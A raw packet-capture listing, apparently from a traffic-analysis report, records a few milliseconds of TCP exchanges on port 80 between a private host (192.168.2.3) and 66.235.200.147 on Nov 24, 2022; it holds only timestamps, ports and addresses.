Nov 24, 2022 12:20:03.335170031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.335184097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335206985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.335222006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335222006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.335241079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335268974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.335275888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335381031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335402012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335421085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335434914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.335439920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335458040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.335462093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.335478067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.342444897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342506886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342550039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342590094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342631102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342652082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.342672110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342706919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.342715979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342755079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342793941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342803955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.342839003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342900991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.342905045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342962027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.342979908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343030930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343071938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343075991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343111992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343153000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343156099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343194008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343235970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343275070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343277931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343314886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343353987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343358040 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343394041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343394995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343435049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343476057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343480110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343516111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343555927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343561888 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343595028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343636036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343676090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343682051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343715906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343755960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343760967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343796015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343796968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343836069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343873978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343885899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343915939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343956947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.343962908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.343996048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344036102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344074965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344078064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344115019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344155073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344158888 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344194889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344196081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344234943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344274044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344294071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344319105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344361067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344366074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344405890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344445944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344453096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344486952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344532013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344548941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344575882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344615936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344655991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344670057 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344696999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344701052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344744921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344786882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344796896 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344830036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344871044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344917059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.344918013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.344957113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345001936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345004082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345041990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345045090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345081091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345122099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345124006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345160961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345208883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345212936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345249891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345289946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345329046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345335007 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345367908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345407963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345412970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345448017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345448971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345489025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345529079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345534086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345568895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345622063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345627069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345679998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345731974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345782995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345783949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345837116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345886946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.345890999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.345946074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346004009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.346007109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346057892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.346060038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346117020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346168995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.346170902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346224070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346280098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.346280098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346343040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346400976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346456051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346457958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.346512079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346570015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.346571922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346621990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.346632004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346689939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346740961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.346743107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346796036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346847057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346848011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.346923113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.346978903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347033978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347038984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.347084999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347134113 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.347136974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347184896 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.347188950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347243071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347296000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347296953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.347347975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347400904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.347400904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347455025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347511053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347563028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.347563982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347615957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347668886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.347670078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347723007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347733974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.347774982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347826958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347879887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.347892046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.347943068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348006964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348057032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348088980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.348109961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348160982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348212957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.348212957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348264933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348314047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.348316908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348366022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.348370075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348422050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348472118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.348478079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348530054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348579884 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.348582029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348634958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348686934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348737001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.348745108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348798990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348853111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348875046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.348903894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.348905087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.348958969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349010944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349011898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.349061966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349117994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349119902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.349170923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349224091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349275112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.349280119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349330902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349383116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.349384069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349431992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.349436045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349488020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349538088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.349539995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349591017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349641085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.349643946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349695921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349749088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349802017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349805117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.349855900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349909067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.349909067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.349956989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.349965096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350018024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350069046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.350069046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350121021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350172997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350174904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.350224972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350276947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350327969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.350330114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350383043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350435019 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.350435019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350482941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.350487947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350542068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350599051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.350599051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350652933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350707054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350708008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.350759029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350811005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.350811005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350871086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.350951910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351011038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351022005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.351072073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351126909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.351126909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351172924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.351180077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351231098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351284027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.351288080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351346970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351407051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351407051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.351455927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.351460934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351512909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351568937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351591110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.351630926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.351641893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351705074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351715088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.351764917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351819992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.351830006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351891994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351965904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.351970911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352020025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352087021 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352113008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352173090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352174044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352229118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352283001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352291107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352334976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352339983 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352392912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352438927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352454901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352478981 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352478981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352487087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352519989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352535963 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352560997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352576017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352602959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352617025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352643013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352658033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352683067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352708101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352724075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352735996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352763891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352780104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352803946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352821112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352844000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352857113 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352885008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352900028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.352929115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.352969885 CET	80	49710	66.235.200.147	192.168.2.3
